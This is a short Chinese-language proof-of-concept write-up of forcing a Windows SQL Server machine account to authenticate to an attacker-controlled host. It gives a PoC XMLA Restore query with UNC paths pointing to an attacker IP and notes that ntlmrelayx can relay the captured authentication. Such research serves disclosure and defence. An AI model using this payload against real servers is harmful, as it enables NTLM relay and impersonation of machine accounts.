
一种强制 Windows SQL Server 对任意计算机进行身份验证的技术。
该概念验证由以下人员共同撰写:
为了触发以本地计算机账户身份进行身份验证,我们需要使用用户凭据连接到远程 SQL Server:

然后我们将选择“还原”(Restore),以从给定文件还原数据库。

要生成 XMLA 文件,请在“备份文件”(Backup File) 表单中放入一个随机文件的路径,并单击“确定”(Ok)。

然后将路径更改为一个随机文件,并将其替换为指向攻击者服务器的 UNC 路径(例如 \\192.168.128\SYSVOL\db.abf)

概念验证 XMLA 查询(poc.xmla):
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
<File>\\192.168.2.51\SYSVOL\db.abf</File>
<DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
<DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>
然后我们就可以获得来自 SQL Server 本地计算机账户的身份验证:

一旦获得身份验证,我们就可以使用 ntlmrelayx 中继该认证,以代表计算机 SQL01$ 执行许多操作。
这很酷,但要从 Linux 攻击机上触发这种强制身份验证却很复杂,因为我们无法使用 SQL Server Management Studio (SSMS)。